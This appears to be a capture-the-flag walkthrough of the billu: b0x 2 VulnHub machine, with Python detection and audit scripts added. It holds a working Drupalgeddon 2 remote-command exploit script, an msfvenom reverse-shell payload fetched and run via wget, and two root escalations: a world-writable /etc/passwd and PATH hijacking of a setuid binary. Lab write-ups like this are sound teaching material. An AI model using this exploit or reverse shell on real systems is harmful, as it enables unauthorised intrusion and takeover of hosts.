This post documents the complete walkthrough of billu: b0x 2, a boot2root VM created by Manish Kishan Tanwar, and hosted at VulnHub. If you are uncomfortable with spoilers, please stop reading now.

Background

Try this if you want an OSCP refresher that’s not too difficult.

Information Gathering

Let’s start with an nmap scan to establish which services are available on the host.

# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129
...
PORT      STATE SERVICE REASON         VERSION
22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 e6:3e:0d:ca:5c:3e:57:f8:1d:e6:e6:c5:3b:b3:67:b5 (DSA)
|   2048 ee:ef:3e:03:3a:24:f8:9f:35:4f:3a:9a:6f:64:a5:f5 (RSA)
|   256 af:60:d8:cb:90:08:63:4b:d3:7b:04:d3:7c:db:cf:bf (ECDSA)
|_  256 c0:56:96:d2:62:52:ea:9f:7f:d8:2a:7a:6b:1b:bd:56 (ED25519)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-methods:
|_  Supported Methods: GET POST HEAD OPTIONS
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips/ /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Home | --==[[ Billu b0x 2 - with love from indishell Lab ]]==--
111/tcp   open  rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          42940/udp  status
|_  100024  1          45103/tcp  status
8080/tcp  open  http    syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
45103/tcp open  status  syn-ack ttl 64 1 (RPC #100024)

nmap finds a handful of open ports. Nothing unusual. Let’s take a look at the web-related ones. The metadata in the HTML source tells me I’m looking at a Drupal 8 installation.

9cbbd925.png

Drupalgeddon

Suffice it to say, the first thought that comes to my mind is Drupalgeddon. Since this is Drupal 8, I’ll give EDB-ID 44448 a shot. It’s proof-of-concept code written in Python that tests for remote command execution: it writes a file and then checks for the file’s existence. In any case, it’s easy to rewrite in bash, i.e. wrap curl in a script and re-purpose it to take an argument: any shell command.

exploit.sh
#!/bin/bash
# Drupalgeddon 2 check: submits the Form API render-array payload from
# EDB-ID 44448 via curl and reports on the HTTP status of the response.

RHOST=192.168.30.129
URL="http://$RHOST/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
CMD="$1"   # the shell command to run on the target

STATUS=$(curl -s \
              -o /dev/null \
              -w '%{http_code}' \
              --data-urlencode "form_id=user_register_form" \
              --data-urlencode "_drupal_ajax=1" \
              --data-urlencode "mail[#post_render][]=exec" \
              --data-urlencode "mail[#type]=markup" \
              --data-urlencode "mail[#markup]=$CMD" \
              "$URL")

if [ "$STATUS" -eq 200 ]; then
  echo "[+] Exploit Successful"
else
  echo "[!] Exploit Failed"
fi

Time to run my exploit script.

On my exploit script terminal

1bc5fcfa.png

On my nc listener

95bbd761.png

You can see the remote command executed successfully.
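From the defender's side, the request the exploit script sends leaves a distinctive trace in Apache's access log. The Python below is an added example, not part of the original write-up or of EDB-ID 44448: it parses combined-format log lines and flags requests that carry the Form API injection markers, namely an element_parents value that reaches a '#'-prefixed render property together with Drupal's AJAX wrapper parameters. The log lines, client addresses and timestamps are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache "combined" log lines (not taken from the VM). The third line
# mirrors the request URL the exploit script in the write-up sends.
SAMPLE_ACCESS_LOG = """\
192.168.30.50 - - [10/Feb/2019:10:01:12 +0000] "GET /user/register HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.30.50 - - [10/Feb/2019:10:01:40 +0000] "GET /node/1 HTTP/1.1" 200 8110 "-" "Mozilla/5.0"
192.168.30.128 - - [10/Feb/2019:10:03:05 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 61 "-" "curl/7.64.0"
"""

# ip, timestamp, method, request target and status from a combined-format line
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def is_drupalgeddon2_probe(target):
    """True if the request target carries the Drupalgeddon 2 markers: an
    element_parents value pointing at a '#'-prefixed render property, combined
    with the AJAX form/wrapper parameters the technique relies on."""
    parts = urlsplit(target)
    params = parse_qs(parts.query)  # parse_qs percent-decodes, so %23value -> #value
    parents = params.get("element_parents", [])
    if not any("#" in p for p in parents):
        return False
    return ("drupal_ajax" in params.get("_wrapper_format", [])
            or "1" in params.get("ajax_form", []))


def scan_access_log(text):
    """Return one dict (ip, ts, method, target, status) per matching request so a
    responder can pivot on source address, time and whether the server answered 200."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_drupalgeddon2_probe(m.group("target")):
            hits.append(m.groupdict())
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("[!] %(ts)s %(ip)s %(method)s %(target)s -> %(status)s" % hit)
```

Only the query string reaches the access log; the mail[#post_render][] payload travels in the POST body and is invisible here, which is why the check keys on the URL parameters alone. A 200 on a flagged request means the server processed it, so the host should be treated as compromised until the Drupal core patch is confirmed applied.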

Next, I’ll make use of wget to transfer a reverse shell (generated by msfvenom), make it executable with chmod, and then execute it.

You can generate the reverse shell with msfvenom like so.

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.30.128 LPORT=1234 -f elf -o rev
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 68 bytes
Final size of elf file: 152 bytes
Saved as: rev

On my exploit script terminal

cd2272c1.png

On my SimpleHTTPServer terminal

743c9c3d.png

On my nc listener

0e917b2f.png

I got shell.

Privilege Escalation

Long story short: once you have a low-privilege shell, there are two ways to gain root privileges.

Method 1: world-writable /etc/passwd

How do you know /etc/passwd is world-writable? Simple.

07134282.png

So what if /etc/passwd is world-writable? What can you do with it? Enough to be dangerous.

2a7227b9.png

su to toor. Password is toor.

1a61b268.png
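Method 1 works because a world-writable /etc/passwd lets any local user append a UID 0 entry with a password hash in the second field, and that field takes precedence over /etc/shadow for the account. The following Python is an added hardening check, not code from the write-up: audit_passwd() parses passwd-format text and flags any entry with a hash in the password field or a second UID 0 account, and is_world_writable() tests a st_mode value. The sample passwd content, including the placeholder hash on the "toor" line, is constructed.

```python
import os
import stat

# Constructed /etc/passwd content modelled on the scenario in the write-up: an extra
# UID 0 account "toor" with its hash stored directly in the password field.
# The hash is a placeholder string, not a real crypt hash.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
tomcat7:x:106:113::/usr/share/tomcat7:/bin/false
toor:$6$constructed$PLACEHOLDERHASH:0:0::/root:/bin/bash
"""

# values in the password field that defer to /etc/shadow or lock the account
SHADOW_MARKERS = {"x", "*", "!", "!!", ""}


def is_world_writable(mode):
    """True if the 'other' write bit is set on a st_mode value (e.g. 0o100666)."""
    return bool(stat.S_IMODE(mode) & stat.S_IWOTH)


def audit_passwd(text):
    """Return (username, reason) findings for passwd-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((line, "malformed entry on line %d" % lineno))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if pw not in SHADOW_MARKERS:
            findings.append((name, "password hash stored in /etc/passwd instead of /etc/shadow"))
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((name, "additional UID 0 account"))
    return findings


def audit_passwd_file(path="/etc/passwd"):
    """Combine the permission check and the content check on a real file."""
    st = os.stat(path)
    findings = []
    if is_world_writable(st.st_mode):
        findings.append((path, "world-writable (mode %o)" % stat.S_IMODE(st.st_mode)))
    with open(path) as fh:
        findings.extend(audit_passwd(fh.read()))
    return findings


if __name__ == "__main__":
    for who, why in audit_passwd(SAMPLE_PASSWD):
        print("[!] %s: %s" % (who, why))
```

On a live host, run audit_passwd_file() as part of a periodic check; the expected result is an empty list and a mode of 0644 owned by root.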

Method 2: /opt/s is setuid to root

How do you know /opt/s is setuid to root? Simple.

6ce80208.png

Check out the strings in the executable. This is a classic: hijacking the default executable search path.

d7faf243.png

scp is not invoked by its absolute path, so the shell resolves it through PATH, and we can put a directory we control at the front of PATH so it is searched first. Heck, we don’t even have to compile any code. Any shell script that starts with #! will suffice, as long as it’s called scp.

5d60d36e.png
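The triage the write-up does by hand with strings can be scripted. As an added example (not the author's code), the Python below walks a tree for root-owned setuid files and, given strings-style output for one of them, reports command names that are invoked by bare name in a binary that also references a libc call that searches PATH. The strings list is constructed to resemble the /opt/s pattern; it is not the real binary's output.

```python
import os
import re
import stat

# Constructed strings-style output for a setuid helper (illustrative only; these are
# not the real strings of /opt/s). Note the bare "scp" next to a "system" reference.
SAMPLE_STRINGS = [
    "/lib/ld-linux.so.2",
    "libc.so.6",
    "setuid",
    "system",
    "scp -r /root/backup root@192.168.30.2:/backup",
    "/usr/bin/logger -t backup done",
    "GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4",
]

# libc routines that hand a command to a shell or search PATH for it
PATH_SEARCHING_CALLS = {"system", "popen", "execlp", "execvp", "execvpe"}

# a string that looks like a command line whose first token has no '/' in it
COMMAND_LINE_RE = re.compile(r"^([A-Za-z][\w.+-]*)\s+\S")


def relative_commands(strings_output):
    """Command names that appear to be invoked by bare name (resolved via PATH)."""
    names = set()
    for s in strings_output:
        m = COMMAND_LINE_RE.match(s)
        if m:
            names.add(m.group(1))
    return sorted(names)


def uses_path_search(strings_output):
    """PATH-searching libc symbols referenced by the binary."""
    return sorted(PATH_SEARCHING_CALLS & set(strings_output))


def triage_setuid_binary(strings_output):
    """Findings for one setuid binary: bare command names plus a PATH-searching call."""
    calls = uses_path_search(strings_output)
    cmds = relative_commands(strings_output)
    if not calls:
        return []
    return ["'%s' is invoked by bare name via %s and resolves through the caller's PATH"
            % (c, "/".join(calls)) for c in cmds]


def find_setuid_files(root="/"):
    """Regular files under root with the setuid bit set and owned by uid 0."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                hits.append(p)
    return hits


if __name__ == "__main__":
    for finding in triage_setuid_binary(SAMPLE_STRINGS):
        print("[!] %s" % finding)
```

The program-side fix is to call helpers by absolute path (or reset PATH to a fixed value before the call) and to drop the setuid bit if the program does not need it; host-side, the find_setuid_files() list should be compared against what the package manager installed, and an entry like /opt/s that no package owns deserves exactly this kind of look.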

:dancer:

Afterthought

A good way to kill time.